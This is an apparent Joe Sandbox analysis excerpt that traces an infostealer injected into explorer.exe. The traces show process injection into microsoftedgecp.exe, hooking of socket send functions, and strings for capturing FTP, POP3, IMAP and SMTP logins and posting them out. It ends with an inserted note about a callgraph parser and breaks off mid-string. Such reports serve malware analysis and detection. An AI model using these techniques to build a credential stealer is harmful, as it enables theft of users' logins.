                                                                                                                            • Instruction ID: 2d69debd8a934100947f8606f16d2cdb9231ffbbf311ebf5798e852e7e4efc39
                                                                                                                            • Opcode Fuzzy Hash: d61328d9644783f32f0c46b7311b119f47afcf68d8a47ee6a31c313ac0ba99db
                                                                                                                            • Instruction Fuzzy Hash: E1511B71E443954FD7216A78CCC0B71FBA0DB422A0B2906F9C6E5C73C6E7547806D7A4

                                                                                                                            Control-flow Graph

                                                                                                                             • Graph image not captured; single basic block 2f02861-2f02871, calling GetProcessHeap and RtlAllocateHeap
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000A000,02F010CC), ref: 02F02864
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02F0286B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357844191-0
                                                                                                                            • Opcode ID: 5a58a4d1c1fd969c237e760ed17ee9523eb0caadd3aeea5a709eed7a823726bf
                                                                                                                            • Instruction ID: 1a65aa5b35538b148e49ce3a19c171a44216c1b556c527d5d3c602f383c9e410
                                                                                                                            • Opcode Fuzzy Hash: 5a58a4d1c1fd969c237e760ed17ee9523eb0caadd3aeea5a709eed7a823726bf
                                                                                                                            • Instruction Fuzzy Hash: 28A01271C81104BFDD4017A0A84DF05BA1CB740B45F008880710AC40448960005C8722

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02F02608: VirtualQuery.KERNEL32(02F04434,?,0000001C), ref: 02F02615
                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,7622E800,microsoftedgecp.exe,?), ref: 02F0184E
                                                                                                                            • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02F01889
                                                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02F01919
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,02F03428,00000016), ref: 02F01940
                                                                                                                            • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02F01968
                                                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02F01978
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02F01992
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 02F0199A
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F019A8
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F019AF
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02F019C5
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02F019CC
                                                                                                                            • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02F019E2
                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02F01A0C
                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02F01A1F
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F01A26
                                                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F01A2D
                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02F01A41
                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02F01A58
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F01A65
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F01A6B
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F01A71
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02F01A74
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                            • String ID: 0-8wP,8w$atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                                                            • API String ID: 1066286714-2452002656
                                                                                                                            • Opcode ID: 21f7aba6f6b535025ecdbb21d42d4df450e1f21d68f008d88a189bc97a9dd463
                                                                                                                            • Instruction ID: 8631cb0ae314c5452392a90a4890047308e013971b1cc433c50761ca348ae5b6
                                                                                                                            • Opcode Fuzzy Hash: 21f7aba6f6b535025ecdbb21d42d4df450e1f21d68f008d88a189bc97a9dd463
                                                                                                                            • Instruction Fuzzy Hash: 78618E71A45308AFE310DF659DC4E6BBBECFF897D8F000A59BA4993280D770D9048BA1

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02F0265A
                                                                                                                            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02F02672
                                                                                                                            • lstrlen.KERNEL32(?,00000000), ref: 02F0267A
                                                                                                                            • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02F02685
                                                                                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02F0269F
                                                                                                                            • wsprintfA.USER32 ref: 02F026B6
                                                                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 02F026CF
                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02F026D9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                            • String ID: %02X
                                                                                                                            • API String ID: 3341110664-436463671
                                                                                                                            • Opcode ID: f1e3251b2238b6ef6ff073e82fdb3261a9d825fdffc36260ba92bae6f0bffa78
                                                                                                                            • Instruction ID: 8bf74fd0840053741c35b433153d37e21d884a3af88476910118b9eb704f5208
                                                                                                                            • Opcode Fuzzy Hash: f1e3251b2238b6ef6ff073e82fdb3261a9d825fdffc36260ba92bae6f0bffa78
                                                                                                                            • Instruction Fuzzy Hash: 4B111971D4110CBFEB119B95EC88EAEBBBCFB48B85F1044A5F605E2144D6718E519B60

Control-flow Graph

control_flow_graph 422 2f01b17-2f01b2c 423 2f01b60-2f01b68 422->423 424 2f01b2e 422->424 426 2f01bc3-2f01bcb 423->426 427 2f01b6a-2f01b6f 423->427 425 2f01b30-2f01b5e RtlMoveMemory 424->425 425->423 425->425 428 2f01c0b 426->428 429 2f01bcd-2f01bdf 426->429 430 2f01bbe-2f01bc1 427->430 433 2f01c0d-2f01c12 428->433 429->428 432 2f01be1-2f01bfe LdrProcessRelocationBlock 429->432 430->426 431 2f01b71-2f01b84 LoadLibraryA 430->431 435 2f01c15-2f01c17 431->435 436 2f01b8a-2f01b8f 431->436 432->428 434 2f01c00-2f01c04 432->434 434->428 437 2f01c06-2f01c09 434->437 435->433 438 2f01bb6-2f01bb9 436->438 437->428 437->432 439 2f01b91-2f01b95 438->439 440 2f01bbb 438->440 441 2f01b97-2f01b9a 439->441 442 2f01b9c-2f01b9f 439->442 440->430 443 2f01ba1-2f01bab GetProcAddress 441->443 442->443 443->435 444 2f01bad-2f01bb3 443->444 444->438
APIs
• RtlMoveMemory.NTDLL(?,?,?), ref: 02F01B4E
• LoadLibraryA.KERNEL32(?,02F04434,00000000,00000000,76232EE0,00000000,02F01910,?,?,?,00000001,?,00000000), ref: 02F01B76
• GetProcAddress.KERNEL32(00000000,-00000002), ref: 02F01BA3
• LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02F01BF4
Memory Dump Source
• Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
Yara matches
Similarity
• API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
• String ID:
• API String ID: 3827878703-0
• Opcode ID: 8c593f8935ba08d92c8b95c8ca36aba7dbc0b705d18588137ea527557902fdad
• Instruction ID: f1880af11dcec869ea3abcc6a83fa8fe8c4c684b95407939219eee746b483273
• Opcode Fuzzy Hash: 8c593f8935ba08d92c8b95c8ca36aba7dbc0b705d18588137ea527557902fdad
• Instruction Fuzzy Hash: 10318475B00215ABCB24CF2DCCC4BA7B7E8BF05399B15856DE94AC7280E731E855DBA0

Control-flow Graph

APIs
  • Part of subcall function 02F02861: GetProcessHeap.KERNEL32(00000008,0000A000,02F010CC), ref: 02F02864
  • Part of subcall function 02F02861: RtlAllocateHeap.NTDLL(00000000), ref: 02F0286B
• GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,02F0109E,?,02F01010), ref: 02F0134A
• GetCurrentProcessId.KERNEL32(00000003,?,02F0109E,?,02F01010), ref: 02F0135B
• wsprintfA.USER32 ref: 02F01372
  • Part of subcall function 02F0263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02F0265A
  • Part of subcall function 02F0263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02F02672
  • Part of subcall function 02F0263E: lstrlen.KERNEL32(?,00000000), ref: 02F0267A
  • Part of subcall function 02F0263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02F02685
  • Part of subcall function 02F0263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02F0269F
  • Part of subcall function 02F0263E: wsprintfA.USER32 ref: 02F026B6
  • Part of subcall function 02F0263E: CryptDestroyHash.ADVAPI32(?), ref: 02F026CF
  • Part of subcall function 02F0263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 02F026D9
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02F01389
• GetLastError.KERNEL32 ref: 02F0138F
• Sleep.KERNEL32(000001F4), ref: 02F013A1
  • Part of subcall function 02F024D5: GetCurrentProcessId.KERNEL32 ref: 02F024E7
  • Part of subcall function 02F024D5: GetCurrentThreadId.KERNEL32 ref: 02F024EF
  • Part of subcall function 02F024D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02F024FF
  • Part of subcall function 02F024D5: Thread32First.KERNEL32(00000000,0000001C), ref: 02F0250D
  • Part of subcall function 02F024D5: CloseHandle.KERNEL32(00000000), ref: 02F02566
• GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 02F013B8
• GetProcAddress.KERNEL32(00000000), ref: 02F013BF
• GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 02F013E4
• GetProcAddress.KERNEL32(00000000), ref: 02F013EB
  • Part of subcall function 02F01DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 02F01E1D
• RtlExitUserThread.NTDLL(00000000), ref: 02F0141D
Strings
Memory Dump Source
• Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
Yara matches
Similarity
• API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
• String ID: %s%d%d%d$WSASend$send$ws2_32.dll
• API String ID: 706757162-1430290102
• Opcode ID: da3ba179f8027b43ea8db77472b7bea23ffbda4bc30753af53eab56888dd3827
• Instruction ID: 15bfe9049a7d5e23bcc94421dbc6d2fe7f7d08ce909ffa25b4d4808fe1d1d470
• Opcode Fuzzy Hash: da3ba179f8027b43ea8db77472b7bea23ffbda4bc30753af53eab56888dd3827
• Instruction Fuzzy Hash: 77318134B81218ABEB016FA19DCDF5B7B5ABF05BC5F004454FB0A961D4CB718821ABA1

Control-flow Graph

control_flow_graph 236 2f01647-2f0165a 237 2f01660-2f01662 236->237 238 2f01748-2f0174f 236->238 237->238 239 2f01668-2f0166b 237->239 239->238 240 2f01671-2f0167d lstrlen 239->240 241 2f01683-2f0168a lstrlen 240->241 242 2f01747 240->242 241->242 243 2f01690-2f016a8 getpeername 241->243 242->238 243->242 244 2f016ae-2f016ca inet_ntoa htons 243->244 244->242 245 2f016cc-2f016d4 244->245 246 2f016d6-2f016d9 245->246 247 2f01708 245->247 248 2f016f3-2f016f8 246->248 249 2f016db-2f016de 246->249 250 2f0170d-2f0173c call 2f02861 wsprintfA call 2f024ae 247->250 248->250 251 2f016e0-2f016e3 249->251 252 2f01701-2f01706 249->252 250->242 260 2f0173e-2f01745 call 2f02843 250->260 254 2f016e5-2f016ea 251->254 255 2f016fa-2f016ff 251->255 252->250 254->248 257 2f016ec-2f016f1 254->257 255->250 257->242 257->248 260->242
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
Yara matches
Similarity
• API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
• String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
• API String ID: 3379139566-1703351401
• Opcode ID: 1b9e9d0bda6b2de0e5d253f9b47ef17b204213efaf5610ef58119445f1af33a6
• Instruction ID: 1fadb1d374034880361c1c268d60976c17b5234d0fad76e87ae3a1f275cb45b3
• Opcode Fuzzy Hash: 1b9e9d0bda6b2de0e5d253f9b47ef17b204213efaf5610ef58119445f1af33a6
• Instruction Fuzzy Hash: 6A21BA36E0020DA79F115FE98DC857FBAA9AB453C5B0440B5DB0CD3184D730D910EB60

Control-flow Graph

control_flow_graph 268 2f01752-2f01774 GetModuleHandleA GetProcAddress 269 2f017c1-2f017c6 268->269 270 2f01776-2f017c0 RtlZeroMemory * 4 268->270 270->269
APIs
• GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,02F01539,?,?,?,02F0144B,?), ref: 02F01763
• GetProcAddress.KERNEL32(00000000), ref: 02F0176A
• RtlZeroMemory.NTDLL(02F04228,00000104), ref: 02F01788
• RtlZeroMemory.NTDLL(02F04118,00000104), ref: 02F01790
• RtlZeroMemory.NTDLL(02F04330,00000104), ref: 02F01798
• RtlZeroMemory.NTDLL(02F04000,00000104), ref: 02F017A1
Strings
Memory Dump Source
• Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
Yara matches
Similarity
• API ID: MemoryZero$AddressHandleModuleProc
• String ID: %s%s%s%s$ntdll.dll$sscanf
• API String ID: 1490332519-278825019
• Opcode ID: 02c64d8ffadb19b7be3ccb015a3c650dc3a7a65d4d19fcfc9dd8205cc4cab757
• Instruction ID: 1f081dc3d55a467ff8dd25b79d489572f6e8bb8dbfd451bca2a1339ef9306ce8
• Opcode Fuzzy Hash: 02c64d8ffadb19b7be3ccb015a3c650dc3a7a65d4d19fcfc9dd8205cc4cab757
• Instruction Fuzzy Hash: F8F08962FC132C33B11032AB7DC6D47BF5CD955DEA3430191B70A731858995E80067B4

Control-flow Graph

APIs
• GetCurrentProcessId.KERNEL32 ref: 02F024E7
• GetCurrentThreadId.KERNEL32 ref: 02F024EF
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02F024FF
• Thread32First.KERNEL32(00000000,0000001C), ref: 02F0250D
• OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02F0252C
• SuspendThread.KERNEL32(00000000), ref: 02F0253C
• CloseHandle.KERNEL32(00000000), ref: 02F0254B
• Thread32Next.KERNEL32(00000000,0000001C), ref: 02F0255B
• CloseHandle.KERNEL32(00000000), ref: 02F02566
Memory Dump Source
• Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
Yara matches
Similarity
• API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
• String ID:
• API String ID: 1467098526-0
• Opcode ID: c55f6c958d77448c7bca51d2bfc0c4220e399d89c29dc3f691572991d2d5518f
• Instruction ID: 7784609e3a687cfcc500455b822c4a5c4e72afb239a01c84067d78a416af0e15
• Opcode Fuzzy Hash: c55f6c958d77448c7bca51d2bfc0c4220e399d89c29dc3f691572991d2d5518f
• Instruction Fuzzy Hash: 0A11C271C46208EFD7109F60A89CF3FFBA4FF84B89F000959FA4182284D33094199BA6

Control-flow Graph

control_flow_graph 282 2f01f4a-2f01fa5 call 2f022b8 call 2f02861 call 2f027e2 call 2f02374 291 2f01fc0-2f01fcc 282->291 292 2f01fa7-2f01fbe 282->292 295 2f01fd0-2f01fd2 291->295 292->295 296 2f022a6-2f022b5 call 2f02843 295->296 297 2f01fd8-2f0200f RtlZeroMemory 295->297 301 2f02015-2f02030 297->301 302 2f0229e-2f022a5 297->302 303 2f02062-2f02074 301->303 304 2f02032-2f02043 call 2f022e5 301->304 302->296 309 2f02078-2f0207a 303->309 310 2f02045-2f02054 304->310 311 2f02056 304->311 313 2f02080-2f020dc call 2f02731 309->313 314 2f0228b-2f02291 309->314 312 2f02058-2f02060 310->312 311->312 312->309 322 2f020e2-2f020e7 313->322 323 2f02284 313->323 315 2f02293-2f02295 call 2f02843 314->315 316 2f0229a 314->316 315->316 316->302 324 2f02101-2f0212f call 2f02861 wsprintfW 322->324 325 2f020e9-2f020fa 322->325 323->314 328 2f02131-2f02133 324->328 329 2f02148-2f0215f 324->329 325->324 330 2f02134-2f02137 328->330 335 2f02161-2f02197 call 2f02861 wsprintfW 329->335 336 2f0219e-2f021b8 329->336 331 2f02142-2f02144 330->331 332 2f02139-2f0213e 330->332 331->329 332->330 334 2f02140 332->334 334->329 335->336 340 2f02261-2f02277 call 2f02843 336->340 341 2f021be-2f021d1 336->341 349 2f02280 340->349 350 2f02279-2f0227b call 2f02843 340->350 341->340 344 2f021d7-2f021ed call 2f02861 341->344 351 2f021ef-2f021fa 344->351 349->323 350->349 353 2f021fc-2f02209 call 2f02826 351->353 354 2f0220e-2f02225 351->354 353->354 358 2f02227 354->358 359 2f02229-2f02236 354->359 358->359 359->351 360 2f02238-2f0223c 359->360 361 2f02256-2f0225d call 2f02843 360->361 362 2f0223e 360->362 361->340 363 2f0223e call 2f02815 362->363 365 2f02243-2f02250 RtlMoveMemory 363->365 365->361
APIs
  • Part of subcall function 02F02861: GetProcessHeap.KERNEL32(00000008,0000A000,02F010CC), ref: 02F02864
  • Part of subcall function 02F02861: RtlAllocateHeap.NTDLL(00000000), ref: 02F0286B
  • Part of subcall function 02F027E2: lstrlen.KERNEL32(02F040DA,?,00000000,00000000,02F01F86,76228A60,02F040DA,00000000), ref: 02F027EA
  • Part of subcall function 02F027E2: MultiByteToWideChar.KERNEL32(00000000,00000000,02F040DA,00000001,00000000,00000000), ref: 02F027FC
  • Part of subcall function 02F02374: RtlZeroMemory.NTDLL(?,00000018), ref: 02F02386
• RtlZeroMemory.NTDLL(?,0000003C), ref: 02F01FE2
• wsprintfW.USER32 ref: 02F0211B
• wsprintfW.USER32 ref: 02F02186
• RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02F02250
Strings
Memory Dump Source
• Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
Yara matches
Similarity
• API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
• String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
• API String ID: 4204651544-1701262698
• Opcode ID: 8ff8626580ad10fb7485a7877493cfb84ef5961f2384a3daef42bb63c37e6684
• Instruction ID: 9092dc84775a44b799445d402158fa4de3690972ec5c4a7d3c97386d40cece59
• Opcode Fuzzy Hash: 8ff8626580ad10fb7485a7877493cfb84ef5961f2384a3daef42bb63c37e6684
• Instruction Fuzzy Hash: CAA15E71A09305AFE7109F64D8C8E2BBBE9BB88784F10492DFA45D3291DB70D9049B62

Control-flow Graph (graph not reproduced in text)
APIs
• OpenProcess.KERNEL32(00000400,00000000,?,7622E800,?,?,microsoftedgecp.exe,02F01287), ref: 02F025BF
• IsWow64Process.KERNEL32(000000FF,?), ref: 02F025D1
• IsWow64Process.KERNEL32(00000000,?), ref: 02F025E4
• CloseHandle.KERNEL32(00000000), ref: 02F025FA
Strings
Memory Dump Source
• Source File: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2f01000_explorer.jbxd
Yara matches
Similarity
• API ID: Process$Wow64$CloseHandleOpen
• String ID: microsoftedgecp.exe
• API String ID: 331459951-1475183003
• Opcode ID: a8ce12b932cff7cde55cada4657c2e5da4cbadee2067f130ded43959c543db99
• Instruction ID: 825d3c5efe3eb59415c6c5ace5cdd8612a81ced41429a5fcec473fe075409eaf
• Opcode Fuzzy Hash: a8ce12b932cff7cde55cada4657c2e5da4cbadee2067f130ded43959c543db99
• Instruction Fuzzy Hash: ABF06272D4261CFF9B108F9099D8DBFB76CEB01699B140299EA0092280D7314F04E6A4

Execution Graph

Execution Coverage: 8.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 9
Total number of Limit Nodes: 2
(execution graph not reproduced in text)

Callgraph (graph not reproduced in text)

Control-flow Graph (graph not reproduced in text)
APIs
• NtUnmapViewOfSection.NTDLL ref: 005C35D8
Memory Dump Source
• Source File: 00000011.00000002.4578892665.00000000005C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_5c1000_explorer.jbxd
Yara matches
Similarity
• API ID: SectionUnmapView
• String ID:
• API String ID: 498011366-0
• Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
• Instruction ID: 322baffc1c02afe4287959af49104bc3d8baeffb05ba91e88e1e2bbfb6d2a77c
• Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
• Instruction Fuzzy Hash: 7C119430615E0D5FEB58BBF8989DB793BA0FB55301F54412EA419C76A1DA39CA40C741

Control-flow Graph (graph not reproduced in text)
APIs
Memory Dump Source
• Source File: 00000011.00000002.4578892665.00000000005C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_5c1000_explorer.jbxd
Yara matches
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
• String ID:
• API String ID: 2482764027-0
• Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
• Instruction ID: 2b30515ccdb89e08f50fd30113119eb5ce4c3f53cf6f5398538fb0bf8443668d
• Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
• Instruction Fuzzy Hash: 628125312186098FEB1AEF54EC98FE6B7A1FB51741F54861EA443C7160EF78DA04CB81

Control-flow Graph (graph not reproduced in text)
APIs
• LoadLibraryA.KERNELBASE ref: 005CA147
• VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 005CA1BB
• VirtualProtect.KERNELBASE ref: 005CA1D9
Memory Dump Source
• Source File: 00000011.00000002.4578892665.00000000005C7000.00000040.80000000.00040000.00000000.sdmp, Offset: 005C7000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_5c7000_explorer.jbxd
Similarity
• API ID: ProtectVirtual$LibraryLoad
• String ID:
• API String ID: 895956442-0
• Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
• Instruction ID: 7328117f6ba064af21b11ea2df17775bbb776b62b4758f3b362c0dec4fb05ce9
• Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
• Instruction Fuzzy Hash: 8D516A3135891D4ECB24AAB89CC8BB5BFD1F755329F18072ED48AC3285E659D846C383

Execution Graph

Execution Coverage: 9.6%
Dynamic/Decrypted Code Coverage: 97.5%
Signature Coverage: 18%
Total number of Nodes: 322
Total number of Limit Nodes: 4
(execution graph not reproduced in text)

                                                                                                                            Callgraph

                                                                                                                             callgraph (caller -> callees, by function address)
                                                                                                                             Function_00471000 -> Function_00471016
                                                                                                                             Function_00471016 -> Function_00472841, Function_004726C9, Function_0047275A, Function_0047276D, Function_004729EB, Function_0047268F, Function_0047288D, Function_00472A09, Function_004710A5, Function_00472724, Function_004712AE, Function_004726AE, Function_004713AE, Function_004718BF
                                                                                                                             Function_004710A5 -> Function_00472841, Function_004726C9, Function_0047275A, Function_0047276D, Function_004729EB, Function_0047268F, Function_0047288D, Function_00472A09, Function_00472724, Function_004712AE, Function_004726AE, Function_004718BF
                                                                                                                             Function_004712AE -> Function_00472841, Function_0047255C, Function_004729EB, Function_00472569, Function_00472A09, Function_004729AE, Function_004729BD
                                                                                                                             Function_004713AE -> Function_004729EB, Function_004725F1, Function_00472A09, Function_00471E89, Function_00472799, Function_00471F3A
                                                                                                                             Function_00471E89 -> Function_00471ED8, Function_00471FEA, Function_00472724
                                                                                                                             Function_00471F3A -> Function_00471E66, Function_00471FEA, Function_00471FB4, Function_004729BD
                                                                                                                             Function_00471E66 -> Function_00471CBF
                                                                                                                             Function_00471FB4 -> Function_00471E26
                                                                                                                             Function_00471E26 -> Function_00471CBF
                                                                                                                             Function_004718BF -> Function_00471B26, Function_00472724, Function_00471BBD
                                                                                                                             Function_00471581 -> Function_004729EB, Function_00472A09, Function_00472724, Function_0047293E, Function_004716B9
                                                                                                                             Function_0047293E -> Function_004729EB, Function_00472A09
                                                                                                                             Function_0047162B -> Function_004716B9
                                                                                                                             Function_004716B9 -> Function_004717DC, Function_004729EB
                                                                                                                             Function_004717DC -> Function_00472A09
                                                                                                                             Function_0047182D -> Function_004729EB, Function_0047200D, Function_00472A09, Function_004725A4, Function_004729AE
                                                                                                                             Function_0047200D -> Function_004729EB, Function_00472A09, Function_004720A1
                                                                                                                             Function_004720A1 -> Function_004724CC, Function_004729EB, Function_0047240F, Function_0047288D, Function_0047298A, Function_00472A09, Function_004729BD, Function_0047243D
                                                                                                                             Function_0047240F -> Function_00472841
                                                                                                                             Function_0047243D -> Function_0047298A, Function_00472A09
                                                                                                                             Function_004725A4 -> Function_00472A09
                                                                                                                             Function_004729EB -> Function_00472724
                                                                                                                             Functions with no caller in this graph: Function_00471000, Function_00471533, Function_00471581, Function_0047162B, Function_0047182D, Function_004729E8, Function_00473627, Function_00479AE0
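The callgraph the report emits is a single line of node and edge tokens. The Python below is an added example (editor's code, not part of the Joe Sandbox report and not the sample's code) that parses that string and answers the question an analyst has when reading it: which call chains run from Function_00471000, the first function in the 00471000 dump, to Function_004718BF, the function that contains the call sites 004718F4 to 00471B1A listed under APIs below (OpenProcess, WriteProcessMemory, CreateRemoteThread). It also lists the functions nothing else in the graph calls. The input is the callgraph tokens copied from this section; treating Function_00471000 as the entry function is my reading of the graph, not a statement the report makes.

```python
import re
from collections import defaultdict

# Editor's added example; not part of the Joe Sandbox report and not code from
# the sample. It parses the report's one-line "callgraph" string and computes
# call chains from the dumped module's first function to the function whose
# API list shows OpenProcess / WriteProcessMemory / CreateRemoteThread.

# Constructed input: the callgraph tokens copied from this report section.
CALLGRAPH = (
    "callgraph 0 Function_00472841 1 Function_004724CC 2 Function_004726C9 "
    "3 Function_0047255C 4 Function_004717DC 22 Function_00472A09 4->22 "
    "5 Function_0047275A 6 Function_00471ED8 7 Function_00471E66 "
    "42 Function_00471CBF 7->42 8 Function_00479AE0 9 Function_0047276D "
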